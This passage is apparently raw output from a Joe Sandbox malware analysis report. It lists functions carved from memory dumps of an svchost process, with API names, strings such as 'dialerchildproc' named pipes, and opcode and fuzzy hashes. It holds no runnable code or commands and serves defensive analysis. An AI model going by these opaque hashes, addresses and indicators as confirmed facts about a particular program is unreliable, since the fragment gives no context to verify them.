• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
• API String ID: 190073905-1786718095
• Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction ID: 3ae14674ec2a8346f3f84ed9e0c01df585913646f7da2965e941060b61735599
• Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction Fuzzy Hash: F581F0717C0E038AFA54DB66A4C03F96ED0AB85BC0F448935FB498379ADB38E8458700

Control-flow Graph

APIs
• GetLastError.KERNEL32 ref: 000001F28C93CE37
• FlsGetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE4C
• FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE6D
• FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE9A
• FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEAB
• FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEBC
• SetLastError.KERNEL32 ref: 000001F28C93CED7
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF0D
• FlsSetValue.KERNEL32(?,?,00000001,000001F28C93ECCC,?,?,?,?,000001F28C93BF9F,?,?,?,?,?,000001F28C937AB0), ref: 000001F28C93CF2C
  • Part of subcall function 000001F28C93D6CC: HeapAlloc.KERNEL32 ref: 000001F28C93D721
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF54
  • Part of subcall function 000001F28C93D744: HeapFree.KERNEL32 ref: 000001F28C93D75A
  • Part of subcall function 000001F28C93D744: GetLastError.KERNEL32 ref: 000001F28C93D764
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF65
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF76
Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
• Instruction ID: c1dccc9a58c3acbe364e99b3de5aaac7dedc88dfaa24f6078136831367b18d4b
• Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
• Instruction Fuzzy Hash: 274149713C1EC782FA68A73159553FA22C25B84BF4F2C27B4E836076E6EF3998018200

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: 57cb264d3990d0bdc8e496bdce57bc45f54469c11ba177c15f029bb998e39be8
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: BE213876658E82C2EB209B25F4443BA67E0F789BE5F544265EA5907AA8DF3CC149CB00

                                                                          Control-flow Graph
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: e40025dd339e04ccce31ab42e6e43acdbfcb282d0efd4a44ebad16c513d6860d
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 51E17A72640B828AEB209BB598803FD77E0F755BE8F196166EE8957B99CF34C481C701

                                                                          Control-flow Graph
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: a9609446f00a766f3d3b655ef47b5d2ff7605ba4997714f758606ca2dc9d6f4c
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: 38E15672644F828AEB609F65E4803ED7BE0F755BD8F104125EB8957B9ACF38E491C740
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 13c93742e32ee18173703abb3e1a129c63d5b1ec7d71d03a5c5f3c659c718adc
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 1E41AF72391E82D1EB16CB76A9087F623D1FB49BE0F0962B9DD0A87785EF39C4458314
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: e61549d0980b68c844d3942048ca76a1816c2b656e0948ec105a341f4de0e688
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 2D412A72254FC5CAE760CF61E4447EA77E1F389B99F448129DA8907B58EF38C589CB40
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 5dc8ff007fbd2db76a624d83063225198278ec11a387f4125d1c2f12366c8b68
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: D2119332794EC782FA68973565613FA62C95B44BF4F1C63F4E839076EADF38C4028200
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 9b580adf4509b41eb4a94773ff5a8102b7ce542dff54e5b26089740a9ad9f4c5
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: ED81F771780EC386FB54AB35AA513F922D1AB85BCCF1CA4F5E90987796EB38C845C710
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: 03f29b56315fbdb1e2c5d3331ac812390df4fb0cbb8384e9f5da931591f2930e
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: 9D31A232292E82E1EE219B62A4007F523D4B748BE0F5E6675DD2E0B7D0EF39C5858310
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 67fdd3f2f8992466b5831d267c2879e71773b428b435bf4b694825e767cf1671
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 69115B71250E82C6E7508B52E8547B966E0F788FE5F448264EA5E87794DB38C9148740
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: 9fd3b5cfc8d5e8966b9d3604d7804b60c4d561f4ad314e44b91f313a0dd5a99b
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: BB112A7A745B82C2EB149B22E4082B962A0F748BD5F4841B9DE8D07B54EF3DC545C704
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction ID: 47c5c9812b7ca215d1726492dddbe4c416650bb443fc8a163cb96cfe57a725b8
                                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction Fuzzy Hash: B7D17876248F8981DB709B1AE4943BA77E0F38CBC8F151166EA8D47BA9DF38C551CB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: b9cea8a45f337747782123fe34ee0897264f1dc14d1d7790dfee48e93a4f475a
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: FF316C36781F96C2EA55DF26E9407BA67E0FB48BC4F089174DE4847B66EF38C4A18700
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: 418adbff46a5a50f38b0b253e874f0d0017697ca07832169e1c80a98fc2d9935
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: A8119D31394EC2C2FA24A73169557FA22D66B88BF4F1863B4E836477DAEF3984018600
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 1a6447b746ba72951b106e25e3206bcaab34f772bbf3986eefe84e7ef40a23b2
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: 5A012D71344E8282EB64DB62A4587B963E5F788BC5F488075DE4983765DF3CC549C740
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: efc9dd88066c2b846a4813f200c66da5525754cb4ea5464905f9a4518e267477
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 690129B5291F82C2FB249B22E8183B963E0BB49BC6F0844B8CD4E07765EF3DC1488700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction ID: f9eb285e1d34bcdb7ed76620ca0307c61ee7c6b0458fb15f7398ffc743cad808
                                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction Fuzzy Hash: A451DF32345A828AEB14CF65E848BB977E6F344BC8F1A91B4DE0653788DB75CA81C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: efef17bbaea8c09d0e74b7a2858e95e013f6fcdb200dc7db2845cff4b926692d
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 71F04F72344EC292EB608F21F8847B967A1F748BC9F889070DA4987964DF3CC68DCB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 148976000f075657713aaae28a70d927c58dd9bf1c24965bf8e6e3b71b7eca3c
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: CBF01275754FC682EA148B53B9141B966A6BB48FD0F08D1B4EE5A47B18DF3CC4458700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: fc48c038c58eca095657e722b28af341116bf169d467f81dd0427d00468570f8
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: 90F090B1351F8681EB208B29E8443F963A1FB89BE1F5456B9CA6A472E4DF3CC048C340
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: 695498e749fc0dccb61c5851ea1446fca79afe24a4ea5175a6ebc953a781018c
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: FE02B536259BC586EB60CB65E4943BAB7E1F3C8794F145065FA8E87BA8DB7CC444CB00
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction ID: af79dd3a637af7051ac8258955ba177530c52f0ebe9781b5e5262fa2f630485f
                                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction Fuzzy Hash: 9B61B736559E86C6E760CB25E4443BAB7E0F388BC4F5421A5FA8E47BA8DB7CC540CB00
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 18dd3864b1be54540109cc27050939df0162b2e3d2136eb0ccd191d63ff6d6f5
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 4B117032AD0ED3A2F6685568E8563F911C16B7C3F8F18C6F4E976077E6CB38CA416201
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: a4a41e1020a2a8b071d84c40f44e8a003d1d22f86d765e777ed5b7e6a37d2a97
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 101191B2AD0F1391FA641528E4C13F91BC16F593F4FC88639E966C73D68BB4C841C200
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                          • Instruction ID: 7bb4e64f612b34c83592e40eb8d5e89f9ecd63dea6d765824e11e06b7d663cc9
                                                                          • Opcode Fuzzy Hash: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                          • Instruction Fuzzy Hash: 26116030786EC382FF549735A8843F922D5AB487E4F0D66B4D926077D9EB38C841C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 8ad1ea8264d7c37166e6a84d5d136f736317519dcbce977c15a2e7b39df90729
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 1B61C1766A0E4242FA699B69E5C43FE6EE1E7867C0F544539DB0B077A4DB34FA42C300
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: f049bdfa4467cedf291596ae25218e3f591c75243dbf1769f2e4c86082fcfec4
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: F8614737601A858AEB209FA5D8803FD77E1F344B98F089265EE4A57B99DB38C595C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
